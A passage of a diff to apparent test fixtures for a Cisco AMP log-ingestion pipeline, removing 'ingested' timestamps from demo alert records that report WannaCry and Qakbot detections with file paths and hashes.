Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 
@@ -3508,7 +3465,6 @@ ], "code": "1090519054", "id": "6419303565650559000", - "ingested": "2022-02-02T05:52:43.212757939Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":791000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558984\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "severity": 2 
@@ -3598,7 +3554,6 @@ ], "code": "1090519054", "id": "6419303565650559000", - "ingested": "2022-02-02T05:52:43.212758878Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":783000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558983\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "severity": 2 
@@ -3692,7 +3647,6 @@ ], "code": "1090519054", "id": "6419303565650559000", - "ingested": "2022-02-02T05:52:43.212761287Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":727000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558982\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":7144,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "severity": 2 
@@ -3793,7 +3747,6 @@ ], "code": "1090519054", "id": "6419303565650559000", - "ingested": "2022-02-02T05:52:43.212762290Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":721000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558981\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":7144,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", "severity": 2 
@@ -3890,7 +3843,6 @@ ], "code": "1090519054", "id": "6419303565650559000", - "ingested": "2022-02-02T05:52:43.212763133Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558980\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 
@@ -3976,7 +3928,6 @@ ], "code": "1090519054", "id": "6419303565650559000", - "ingested": "2022-02-02T05:52:43.212763955Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":504000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "severity": 2 
@@ -4066,7 +4017,6 @@ ], "code": "1090519054", "id": "6419303565650559000", - "ingested": "2022-02-02T05:52:43.212764768Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":426000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419303565650558978\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":768,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "severity": 2 
@@ -4169,7 +4119,6 @@ ], "code": "1090519054", "id": "6419303565650559000", - "ingested": "2022-02-02T05:52:43.212765732Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":399000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419303565650558977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":768,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "severity": 2 
@@ -4258,7 +4207,6 @@ "action": "Policy Update", "code": "553648130", "id": "6412662859016176000", - "ingested": "2022-02-02T05:52:43.212766555Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662859016176000,\"timestamp\":1610651432,\"timestamp_nanoseconds\":199000000,\"date\":\"2021-01-14T19:10:32+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "severity": 0 
@@ -4314,7 +4262,6 @@ "action": "Policy Update", "code": "553648130", "id": "6412662854721208000", - "ingested": "2022-02-02T05:52:43.212767377Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662854721208000,\"timestamp\":1610651431,\"timestamp_nanoseconds\":856000000,\"date\":\"2021-01-14T19:10:31+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "severity": 0 
@@ -4382,7 +4329,6 @@ ], "code": "2164260893", "id": "6412662850426241000", - "ingested": "2022-02-02T05:52:43.212768192Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":233000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241035\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "severity": 3 
@@ -4458,7 +4404,6 @@ ], "code": "2164260893", "id": "6412662850426241000", - "ingested": "2022-02-02T05:52:43.212769024Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241034\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "severity": 3 
@@ -4534,7 +4479,6 @@ ], "code": "2164260893", "id": "6412662850426241000", - "ingested": "2022-02-02T05:52:43.212769858Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241033\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "severity": 3 
@@ -4608,7 +4552,6 @@ ], "code": "553648147", "id": "6412662850426241000", - "ingested": "2022-02-02T05:52:43.212770671Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241035\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"el2j9fcqj.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\el2j9fcqj.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "severity": 3 
@@ -4688,7 +4631,6 @@ ], "code": "553648147", "id": "6412662850426241000", - "ingested": "2022-02-02T05:52:43.212771500Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241034\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"kepv86368.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\kepv86368.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "severity": 3 
@@ -4768,7 +4710,6 @@ ], "code": "553648147", "id": "6412662850426241000", - "ingested": "2022-02-02T05:52:43.212772327Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241033\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"uqlq0o884.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\uqlq0o884.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "severity": 3 
